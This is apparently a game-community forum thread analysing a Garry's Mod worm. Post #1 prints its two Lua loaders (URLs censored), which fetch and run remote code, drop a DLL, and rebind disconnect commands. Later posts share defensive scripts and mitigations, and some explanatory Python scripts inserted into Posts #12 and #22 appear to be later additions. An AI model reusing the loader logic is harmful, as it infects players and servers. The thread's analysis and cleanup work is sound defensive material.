1. Post #1 by LennyPenny (Gold Member, December 2011, 1,145 Posts)
    10 minutes ago a friend contacted me about his Steam being spammed with messages like "fix it vinh" to all of his Steam friends after joining a server. (Here's the chatlog: http://puu.sh/8ej4h.txt)

    When bringing it up to Dingusnin he told me that there was a thread made about this 5 min ago, but after I had a look at it, it got deleted because it contained the code to spread the virus. We managed to save the virus code, but we can't spread it right here since the thread would get deleted again.

    Here is a censored version of the original post.

    Some of our clients, and our server, recently got messed with by Chrisaster, or one of his buddies that go under the same name, or VIN; the files involved are client_infect.lua and server_infect.lua.


    Seems they do this through client uploads.

    Not 100% sure, but it seems they hack into RCON (they can get your RCON password through clientside Lua, even with client uploads disabled), put some files on there, then they use some other fancy doodads to infect the server and clients more.

    Some of their code leaked into our console, so here's what I found, make what you want of it, and keep in mind that these scripts were very recently made, this is a new thing:


    Here's the server_infect.lua
    -- Loaded over HTTP by Lua through CompileString(...)() via rcon request
    if not system.IsWindows() then
    	return -- the dropped module is a win32 DLL, so only Windows hosts are targeted
    end
    
    if file.Exists("lua/autorun/server/default.lua", "MOD") then
    	return -- Already infected
    end
    
    -- Poll every 2 seconds until the native module has landed in download/
    -- (where the engine stores client-uploaded files).
    timer.Create("infchk", 2, 0, function()
    	if file.Exists("download/engine_win32.dll", "MOD") then
    		timer.Remove("infchk")
    
    		-- Path traversal out of the directory require() normally loads
    		-- modules from: this picks up the download/engine_win32.dll the
    		-- loop just waited for.
    		require("/../../../download/engine")
    
    		-- CreateFile is not a stock GMod Lua function; it appears to be
    		-- exported by the module loaded above.
    		http.Fetch("*ACTUAL LINK TO VIRUS CODE HERE", function(content)
    			CreateFile("garrysmod/lua/autorun/server/default.lua", content)
    
    			-- Run stage 2 now; as an autorun script it also runs on every restart/map load
    			include("autorun/server/default.lua")
    		end, function() end)
    	end
    end)
    


    Here's the client_infect.lua
    -- Loaded over HTTP by Lua through client:SendLua(..)
    if not system.IsWindows() then
    	return
    end
     
    if file.Exists("bin/game_shader_generic_engine.dll", "MOD") then
    	return -- Already infected
    end
     
    -- Same wait loop as the server script: the DLL has to arrive through the
    -- engine's file transfer before anything else happens.
    timer.Create("infchk", 2, 0, function()
    	if file.Exists("download/engine_win32.dll", "MOD") then
    		timer.Remove("infchk")
     
    		require("/../../../download/engine") -- same path traversal as the server side
     
    		-- CreateFile, GetShaderBinary and ConCommand are not stock GMod Lua;
    		-- they appear to come from the module loaded above.
    		http.Fetch("SAME HERE", function(content)
    			-- Persistence: drop a DLL under a shader-library name in the game's
    			-- bin directory, and stash the Lua payload as a fake texture
    			CreateFile("garrysmod/bin/game_shader_generic_engine.dll", GetShaderBinary())
    			CreateFile("garrysmod/materials/cooltexture.vtf", content)
    			
    			-- Run the fetched payload right away; the chunk is named "l" and
    			-- pcall swallows any error it raises
    			local ret = CompileString( content, "l", false )
    			pcall(ret)
     
    			-- Rebind every way a player could leave or change server so the game quits instead
    			timer.Simple(4, function()
    				ConCommand("alias disconnect quit\n")
    				ConCommand("alias gamemenucommand quit\n")
    				ConCommand("alias retry quit\n")
    				ConCommand("alias connect quit\n")
    				ConCommand("alias map quit\n")
    			end)
    		end)
    	end
    end)
    

    Hey Garry, or Valve, maybe you can find some ways to fix this a bit?


    Thanks, and VINH'LL FIX IT@@.
    Edited:

    If someone important needs the critical code, we will supply it.

  2. Post #2 by Dennab (I'm Better Than You, August 2008, 5,414 Posts)
    i'm sure vinh'll fix it

    Edited:

    the patch code has already been written, vinh's already fixed it!

  3. Post #3 (Author of the detected GMod Cheat cheat Oubhack, January 2012, 634 Posts)
    > i'm sure vinh'll fix it
    you gonna get swebony to delete this thread too or what?

  4. Post #4 by The freeman (Gold Member, October 2007, 6,504 Posts)
    > you gonna get swebony to delete this thread too or what?
    Why would a mod abuse powers just because? It's free money.

  5. Post #5 by Swebonny (moderator, August 2006, 13,007 Posts)
    > you gonna get swebony to delete this thread too or what?
    That other thread had some parts that I assume could easily be abused by people, so I quickly deleted it. However, I forwarded it to garry/the other moderators, so they'll be able to take a closer look at it.

    The OP of this thread removed those parts, so I'll let this one stay.

  6. Post #6 (Author of the detected GMod Cheat cheat Oubhack, January 2012, 634 Posts)
    > Why would a mod abuse powers just because? It's free money.
    Swebonny deleted the thread Chrisaster and Friends: Infecting Servers and Clients! in Developer Discussion with the reason Virus code

  7. Post #7 by The freeman (Gold Member, October 2007, 6,504 Posts)
    Yeah and spreading a method of spreading viruses is a very very very very very very very very very very very very bad idea.

  8. Post #8 by dingusnin (Gold Member, February 2010, 1,992 Posts)
    Quick untested fix that servers should send to the clients.

    Code:
    local BannedFunctions = {
    	'CreateFile',
    	'SendFile',
    	'SWJoinGroupChat',
    	'DeleteFile',
    	'RequestFile'
    }
    
    -- Removes the globals the loader calls and runs the rest of the chunk in an
    -- environment that reads through to (and writes into) the cleaned globals.
    -- This only hides the Lua-visible names; the native module that exports
    -- them stays loaded.
    function ClearFEnv()
    	local environment = getfenv() -- _G when called from a file chunk
    
    	for _, name in ipairs(BannedFunctions) do
    		-- assign through the table; `v = nil` only cleared the loop variable
    		environment[name] = nil
    	end
    
    	-- setfenv takes a function (or stack level) and a plain table; the
    	-- metatable goes on that table. Level 2 is the chunk that called us.
    	setfenv(2, setmetatable({}, {
    		__index = environment,
    		__newindex = function(_, k, v)
    			rawset(environment, k, v)
    		end
    	}))
    end
    
    ClearFEnv()
    Again, untested. I have my suspicions on how it works, but I will be able to test it in the morning. If you guys need a download link, either go on infected servers or PM me, I will get back to you soon.

  9. Post #9 by jackool (me, June 2005, 616 Posts)
    Yeah this is for sure affecting lots of people. I've been spammed with "FIX IT VINH" by at least 4 people today.

  10. Post #10 by LennyPenny (Gold Member, December 2011, 1,145 Posts)
    I'm pretty upset right now, there was another "virus exploit" like this a few months ago.
    Imagine someone like the owner of the tdmcars workshop addon (just an example) quickly patching this in (with a more serious payload), hitting thousands of people and then just patching it out again and going unnoticed.

  11. Post #11 by zerothefallen (March 2010, 8,113 Posts)
    > I'm pretty upset right now, there was another "virus exploit" like this a few months ago.
    > Imagine someone like the owner of the tdmcars workshop addon (just an example) quickly patching this (with a more serious payload) in, hitting thousands of people and then just patching it out again and going unnoticed.
    are you stupid or what

    it's like you don't understand that this is a sandbox game, no flying fuck exploits are going to hit.



    do you actually expect it to never happen?

  12. Post #12 by Dennab (I'm Better Than You, August 2008, 5,414 Posts)
    > Again, untested. I have my suspicions on how it works, but I will be able to test it in the morning. If you guys need a download link, either go on infected servers or PM me, I will get back to you soon.
    if GetTimeStamp() < (1397865590 + (60 * 60 * 12)) then return end
    ...
    DeleteFile("garrysmod/materials/cooltexture.vtf")

    looks like it cleans up after itself in about 10 hours' time

    Like I said before vinh already has code to patch this, it'll be pushed out asap.
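    As an added example (not code from this thread, from Garry's Mod, or from anyone quoted here), the script below does the static triage a server operator would want for the two loaders in Post #1 and the self-cleaning stage-2 guard quoted in Post #12: a handful of rules flag the require() path traversal, http.Fetch() output handed to CompileString()/include(), files written into lua/autorun or bin, and the alias rebinding, and any `GetTimeStamp() < ... then` guard is decoded into a UTC date so you know when the cleanup fires. The rule names are mine; the sample inputs are trimmed copies of the URL-censored snippets from Posts #1 and #12, embedded as constructed input so it runs offline.

```python
"""Static triage for the two-stage Lua loader pattern in this thread.
Added example, not code from the thread or from Garry's Mod. The samples
are trimmed, URL-censored copies of the snippets from Posts #1 and #12."""
import ast
import datetime as dt
import operator
import re

# (rule name, pattern, why it matters)
RULES = [
    ("require-traversal", re.compile(r'require\(\s*["\'][^"\']*\.\./'),
     "require() walks out of its module directory to load a file dropped elsewhere"),
    ("fetch-then-exec",
     re.compile(r'http\.Fetch\(.*?(CompileString|RunString|include)\(', re.S),
     "downloaded content is compiled or included instead of treated as data"),
    ("drops-autorun", re.compile(r'CreateFile\(\s*["\'][^"\']*lua/autorun/'),
     "writes a script into an autorun directory for persistence"),
    ("drops-dll", re.compile(r'CreateFile\(\s*["\'][^"\']*\.dll["\']'),
     "writes a native module into the game tree"),
    ("alias-hijack",
     re.compile(r'alias\s+(disconnect|retry|connect|map|gamemenucommand)\s'),
     "rebinds console commands so the player cannot leave the server normally"),
]

TIMEBOMB = re.compile(r'GetTimeStamp\(\)\s*<\s*(.+?)\s*then', re.S)
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def safe_int_expr(expr):
    """Evaluate an integer +, -, * expression (parentheses allowed) without eval()."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported expression: %r" % expr)
    return walk(ast.parse(expr.strip(), mode="eval"))


def scan_lua(source):
    """Return the rule names that fire and the decoded expiry epoch (or None)."""
    findings = [name for name, rx, _ in RULES if rx.search(source)]
    expires_at = None
    m = TIMEBOMB.search(source)
    if m:
        try:
            expires_at = safe_int_expr(m.group(1))
        except (ValueError, SyntaxError):
            pass  # guard is not literal arithmetic; report no date
    return {"findings": findings, "expires_at": expires_at}


def expiry_utc(epoch):
    """Render a decoded GetTimeStamp() bound as an ISO-8601 UTC timestamp."""
    return dt.datetime.fromtimestamp(epoch, dt.timezone.utc).isoformat()


# Constructed samples: trimmed copies of the snippets posted in this thread.
SERVER_SAMPLE = r'''
if file.Exists("lua/autorun/server/default.lua", "MOD") then return end
timer.Create("infchk", 2, 0, function()
	if file.Exists("download/engine_win32.dll", "MOD") then
		timer.Remove("infchk")
		require("/../../../download/engine")
		http.Fetch("*ACTUAL LINK TO VIRUS CODE HERE", function(content)
			CreateFile("garrysmod/lua/autorun/server/default.lua", content)
			include("autorun/server/default.lua")
		end, function() end)
	end
end)
'''
CLIENT_SAMPLE = r'''
require("/../../../download/engine")
http.Fetch("SAME HERE", function(content)
	CreateFile("garrysmod/bin/game_shader_generic_engine.dll", GetShaderBinary())
	CreateFile("garrysmod/materials/cooltexture.vtf", content)
	pcall(CompileString(content, "l", false))
	ConCommand("alias disconnect quit\n")
end)
'''
STAGE2_SAMPLE = r'''
if GetTimeStamp() < (1397865590 + (60 * 60 * 12)) then return end
DeleteFile("garrysmod/materials/cooltexture.vtf")
'''

if __name__ == "__main__":
    for label, src in (("server_infect.lua", SERVER_SAMPLE),
                       ("client_infect.lua", CLIENT_SAMPLE),
                       ("stage-2 cleanup", STAGE2_SAMPLE)):
        r = scan_lua(src)
        when = expiry_utc(r["expires_at"]) if r["expires_at"] else "no time guard"
        print("%-18s %-60s %s" % (label, ", ".join(r["findings"]) or "-", when))
```

    Point it at every file under lua/autorun (server and client) and at anything in download/; a hit on fetch-then-exec or require-traversal is worth reading by hand even when the other rules stay quiet. The arithmetic in the guard is evaluated through the ast module rather than eval() so a hostile script cannot run Python while being triaged.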

  13. Post #13 by nettsam (May 2013, 304 Posts)
    [SPOILER]
    nettsam,
    Handsome Matt,
    !cake,
    Rockeiro123,
    FoohyAB,
    Jeezy,
    Kingbob387,
    Willox,
    The freeman,
    code_gs,
    zerothefallen,
    munch,
    GamingRobot32,
    toaster468,
    Grimreaperx1,
    Bumrang,
    Alex_grist,
    >>oubliette<<,
    dingusnin,
    Rohans,
    jamie1130,
    jackool,
    Ott,
    awcmon,
    Berkin,
    MattTheSpy,
    Leystryku,
    farmatyr,
    bean_xp

    (32 guests)
    [/SPOILER]

    nice

  14. Post #14 by The freeman (Gold Member, October 2007, 6,504 Posts)
    > (quotes nettsam's list of users viewing the thread from Post #13)
    How is this relevant

  15. Post #15 by toaster468 (Gold Member, January 2010, 3,227 Posts)
    sup

  16. Post #16 by Dennab (I'm Better Than You, August 2008, 5,414 Posts)
    > How is this relevant
    they're the perpetrators duh.

  17. Post #17 by Rohans (Gold Member, September 2010, 166 Posts)
    ready to get b&??

  18. Post #18 by !cake (Gold Member, January 2010, 81 Posts)
    I managed to get hold of the entirety of the lua part of the virus (won't say how, but it involved zero risk of infection and would make you laugh).

    As far as I can tell there's only one noteworthy exploit in the lua part and all the heavy lifting is done by the engine_win32.dll module, which I didn't manage to get.
    It'd be interesting to see wtf that module does to coerce servers to send .cfg files to clients and convince clients + servers to accept .dll uploads / downloads.

    Basically if you don't store rcon passwords in cfg/server.cfg, your server should be safe.

  19. Post #19 by Dennab (I'm Better Than You, August 2008, 5,414 Posts)
    > Basically if you don't store rcon passwords in cfg/server.cfg, your server should be safe.
    Just sv_allowdownload 0 and sv_allowupload 0; otherwise you can still have any file downloaded or any file uploaded.

  20. Post #20 by LennyPenny (Gold Member, December 2011, 1,145 Posts)
    > As far as I can tell there's only one noteworthy exploit in the lua part and all the heavy lifting is done by the engine_win32.dll module, which I didn't manage to get.
    We managed to get the infected dll from the friend that contacted me. I'm pretty sure we can release it once the update is out so everyone can have their own look at it. Dingusnin already managed to reverse some key parts.

  21. Post #21 by The freeman (Gold Member, October 2007, 6,504 Posts)
    > I managed to get hold of the entirety of the lua part of the virus (won't say how, but it involved zero risk of infection and would make you laugh).
    >
    > As far as I can tell there's only one noteworthy exploit in the lua part and all the heavy lifting is done by the engine_win32.dll module, which I didn't manage to get.
    > It'd be interesting to see wtf that module does to coerce servers to send .cfg files to clients and convince clients + servers to accept .dll uploads / downloads.
    >
    > Basically if you don't store rcon passwords in cfg/server.cfg, your server should be safe.
    The hack could ~probably~ be engineered to download all .cfg files in a server's directory and search them for the rcon password. Surely there aren't a lot of .cfg files in a regular server anyhow.

  22. Post #22 by Dennab (January 2008, 121 Posts)
    Made this batch file to remove all traces of this exploit.

    Run from the "garrysmod" folder on either the client or server.

    Code:
    @echo off
    title Exploit file cleanup - MFSiNC
    
    :: Allow running from the game root (next to hl2.exe) as well as from garrysmod\
    if exist "hl2.exe" (
    	cd "garrysmod"
    )
    
    if not exist steam.inf (
    	echo.
    	echo You're running this from the wrong place!
    	echo.
    	echo Put this file in your garrysmod folder, either server or client, and re-run it.
    	echo.
    	echo.
    	pause
    	exit /b 1
    )
    
    echo.
    echo This will remove the files used in the exploit/virus.
    echo.
    echo To see exactly what will be removed, open this batch file with Notepad.
    echo.
    pause
    
    echo Cleaning..
    
    :: Stop the game/server first so the loaded DLL releases its file handle;
    :: silence stdout and stderr in case the process is not running.
    taskkill /F /IM hl2.exe >nul 2>&1
    taskkill /F /IM srcds.exe >nul 2>&1
    
    
    
    ::Files, clientside
    :: attrib clears the hidden/system/read-only bits so del does not refuse the file
    if exist "engine_win32.dll" (
    	attrib -h -s -r "engine_win32.dll"
    	del /F /Q "engine_win32.dll"
    )
    
    if exist "materials\cooltexture.vtf" (
    	del /F /Q "materials\cooltexture.vtf"
    )
    
    if exist "bin\game_shader_generic_engine.dll" (
    	attrib -h -s -r "bin\game_shader_generic_engine.dll"
    	del /F /Q "bin\game_shader_generic_engine.dll"
    )
    
    if exist "download\engine_win32.dll" (
    	attrib -h -s -r "download\engine_win32.dll"
    	del /F /Q "download\engine_win32.dll"
    )
    
    ::Dir (cfg files pulled from servers end up here)
    if exist "download\cfg" (
    	RD /S /Q "download\cfg"
    )
    
    
    
    ::Files, serverside
    if exist "lua\autorun\server\default.lua" (
    	attrib -h -s -r "lua\autorun\server\default.lua"
    	del /F /Q "lua\autorun\server\default.lua"
    )
    
    
    
    echo.
    echo Done.
    echo.
    pause
    Garry: Remove these files at the next GMod update.
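    An added example (not code from this thread or from Garry's Mod) that does the same sweep as the batch file above but portably, and bolts on the server.cfg audit implied by Posts #18 and #19: it reports every artifact from the batch file's list that is present under a garrysmod directory, removes them only when asked, and flags rcon_password stored in a cfg file and sv_allowupload/sv_allowdownload set to 1. The artifact list is copied from the batch file; the cvar checks and message wording are mine. The demo builds a throwaway garrysmod tree in a temp directory with constructed contents, so nothing on the host is touched.

```python
"""Artifact sweep and server.cfg audit for the GMod loader in this thread.
Added example, not code from the thread or from Garry's Mod; the artifact
paths come from the batch file posted above."""
import os
import shutil
import tempfile

# Relative to the garrysmod directory; the last entry is a directory.
ARTIFACTS = [
    "engine_win32.dll",
    "download/engine_win32.dll",
    "bin/game_shader_generic_engine.dll",
    "materials/cooltexture.vtf",
    "lua/autorun/server/default.lua",
    "download/cfg",
]


def find_artifacts(root):
    """Return the artifact paths present under root, in ARTIFACTS order."""
    return [rel for rel in ARTIFACTS if os.path.lexists(os.path.join(root, rel))]


def remove_artifacts(root, dry_run=True):
    """Delete the artifacts that exist; with dry_run only report what would go.

    Hidden attributes do not block os.remove on Windows, so no attrib step is needed."""
    hits = find_artifacts(root)
    for rel in hits:
        if dry_run:
            continue
        path = os.path.join(root, rel)
        if os.path.isdir(path) and not os.path.islink(path):
            shutil.rmtree(path)
        else:
            os.remove(path)
    return hits


def audit_server_cfg(text):
    """Flag the cfg settings this thread calls out. Returns a list of issue strings."""
    issues = []
    for raw in text.splitlines():
        line = raw.split("//", 1)[0].strip()  # drop Source-style comments
        if not line:
            continue
        parts = line.replace('"', " ").split()
        key = parts[0].lower()
        value = parts[1] if len(parts) > 1 else ""
        if key == "rcon_password" and value:
            issues.append("rcon_password is stored in the cfg file; a client that can "
                          "pull cfg files from the server gets RCON")
        elif key in ("sv_allowupload", "sv_allowdownload") and value == "1":
            issues.append("%s 1 enables the engine file transfer this loader rides on" % key)
    return issues


# Constructed fixture contents (the password is a placeholder, not a real one).
SAMPLE_CFG = (
    'hostname "demo server"\n'
    'rcon_password "hunter2"   // constructed value\n'
    'sv_allowupload 1\n'
    'sv_allowdownload 0\n'
)


def build_demo_tree():
    """Create an infected-looking garrysmod tree in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="gmod-demo-")
    for rel in ("download/engine_win32.dll", "materials/cooltexture.vtf",
                "lua/autorun/server/default.lua", "download/cfg/server.cfg"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("placeholder\n")
    os.makedirs(os.path.join(root, "cfg"))
    with open(os.path.join(root, "cfg", "server.cfg"), "w") as fh:
        fh.write(SAMPLE_CFG)
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    print("found:  ", find_artifacts(root))
    print("removed:", remove_artifacts(root, dry_run=False))
    print("left:   ", find_artifacts(root))
    with open(os.path.join(root, "cfg", "server.cfg")) as fh:
        for issue in audit_server_cfg(fh.read()):
            print("cfg:    ", issue)
    shutil.rmtree(root)
```

    Run it with the real garrysmod path and dry_run left at True first; the batch file's taskkill step still applies on a live box, because a loaded DLL cannot be deleted while the process holds it. The audit reads the cfg the way the engine does (first token is the cvar, comments start with //), so `rcon_password ""` and `sv_allowupload 0` pass clean.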

  23. Post #23 by code_gs (March 2013, 10,419 Posts)
    Also, for the love of god, stop using sv_allowupload. It has major exploits in many Source games.

  24. Post #24 by Abdul (July 2012, 96 Posts)
    > Also, for the love of god, stop using sv_allowupload. It has major exploits in many Source games.
    Isn't this needed for sprays to work?

  25. Post #25 by zerothefallen (March 2010, 8,113 Posts)
    > Isn't this needed for sprays to work?
    yup

  26. Post #26 (April 2014, 3 Posts)
    Thanks for reposting my thread that got deleted.

    Infected clients with engine_win32.dll in their download folder are acquiring servers' RCON passwords and running a command that infects the server, which then infects every other client on the server.


    These guys are literally acquiring everyone's RCON passwords, and are probably going to do more with it in the future if it's not fixed.

    By the way, if you disable your server's RCON, an infected client that joins will somehow turn RCON back on and set it to derphurp or some shit like that.

  27. Post #27 by code_gs (March 2013, 10,419 Posts)
    Not in all cases. Some guy told me he got sprays working with sv_allowdownload.

  28. Post #28 by zerothefallen (March 2010, 8,113 Posts)
    (Console) banned Itami permanently (Detected foreign source file l.)
    [18:55:36] Dropped "Itami" from server<STEAM_0:0:55206120>
    [18:55:36] (Console) banned cunt permanently (Detected foreign source file l.)
    [18:55:36] Dropped "cunt" from server<STEAM_0:0:47477632>
    [18:55:37] (Console) banned liteops1 permanently (Detected foreign source file l.)
    [18:55:37] Dropped "liteops1" from server<STEAM_0:1:70544069>
    [18:55:37] (Console) banned DragonFire245 permanently (Detected foreign source file l.)
    [18:55:37] Dropped "DragonFire245" from server<STEAM_0:1:52868695>
    [18:55:39] (Console) banned APinkFlamingo permanently (Detected foreign source file l.)
    [18:55:39] Dropped "APinkFlamingo" from server<STEAM_0:0:45115099>


    I find this hilarious, qac doesnt like it and is mass banning almost everyone from every server that has a copy


    best ac


    edit: oh god im getting so many messages

    at least 450 infected people banned hahahahaha

  29. Post #29 (April 2014, 3 Posts)
    EDIT: Sorry double post

  30. Post #30 by zerothefallen (March 2010, 8,113 Posts)
    > Not in all cases. Some guy told me he got sprays working with sv_allowdownload.
    then he most likely isn't using Valve's own spray thing. Could always use a Lua spray thing.

  31. Post #31 by nettsam (May 2013, 304 Posts)
    > (quotes zerothefallen's QAC ban log and comments from Post #28)
    once i got perma'd for having this


  32. Post #32 by zerothefallen (March 2010, 8,113 Posts)
    > once i got perma'd for having this

    my code is racist.

  33. Post #33
    > Not in all cases. Some guy told me he got sprays working with sv_allowdownload.
    It's sv_allowupload which controls sprays, not download.

  34. Post #34 (April 2014, 3 Posts)
    > That other thread got some parts that I assume could easily be abused by people, so I quickly deleted it. However I forwarded it to garry/the other moderators, so they'll be able to take a closer look at it.
    >
    > The OP of this thread removed those parts, so I'll let this one stay.
    I just read this, I understand you removed it for a reason like that. Hopefully there's some way these exploits can be patched over.

    I wanted someone in Facepunch to realize this is happening.

  35. Post #35 by !cake (Gold Member, January 2010, 81 Posts)
    Just noticed that the virus hits a tracking website... which lets us have live map of infections:
    http://freehostedscripts.net/oc.php?...RzLm5ldHwxfA==

  36. Post #36 by Zombie man70 (I paid $1 and all got was an STD, October 2007, 1,778 Posts)
    5056 guests, holy shit. This thing must have hit hard.

  37. Post #37 by nettsam (May 2013, 304 Posts)
    > Just noticed that the virus hits a tracking website... which lets us have live map of infections:
    > http://freehostedscripts.net/oc.php?...RzLm5ldHwxfA==
    thats awesome, thanks for link

  38. Post #38 by Dennab (I'm Better Than You, August 2008, 5,414 Posts)
    > Just noticed that the virus hits a tracking website... which lets us have live map of infections:
    > http://freehostedscripts.net/oc.php?...RzLm5ldHwxfA==
    This executes when a player joins a server and only then, so I don't think this accounts for every infected client.

  39. Post #39 by KennyAwsum (I'll RUB MY TALENT OUT ALL OVER YOU, November 2011, 4,484 Posts)

    oh god

  40. Post #40 by seano12 (Creep, July 2006, 10,542 Posts)
    I've never seen so many guests before.